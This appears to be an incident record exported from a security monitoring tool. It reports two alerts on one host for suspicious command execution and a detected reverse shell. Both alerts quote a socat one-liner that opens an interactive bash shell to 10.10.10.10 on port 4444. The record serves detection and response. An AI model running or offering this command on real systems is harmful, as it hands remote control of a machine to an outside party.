Incident Overview

Incident ID: CINC-20251220-DCF17F8D
Severity: High (80)
Status: new
Alert Count: 2
Host Count: 1

Timeline

First Seen: 2025-12-20 09:08:54
Last Seen: 2025-12-20 09:08:54
Duration: 0d 0h 0m
Created: 2025-12-20 13:23
Updated: 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Execution
Techniques: Command and Scripting Interpreter

Affected Hosts (1)

localhost.localdomain

Related Alerts (2)

Severity: High
Status: new
Hostname: localhost.localdomain
Description: The commands executed on this CLI are suspicious and may be related to malicious activity. Review the commands to see if they are expected.
Tactic: Execution
Command Line: bash -c socat exec:'bash -li',pty,stderr tcp:10.10.10.10:4444
Time: 12-20 09:08

Severity: Critical
Status: new
Hostname: localhost.localdomain
Description: A reverse shell has been detected on your host. It may provide adversaries with an interactive terminal. Check the process tree to determine if this access was expected.
Tactic: Execution
Command Line: bash -c socat exec:'bash -li',pty,stderr tcp:10.10.10.10:4444
Time: 12-20 09:08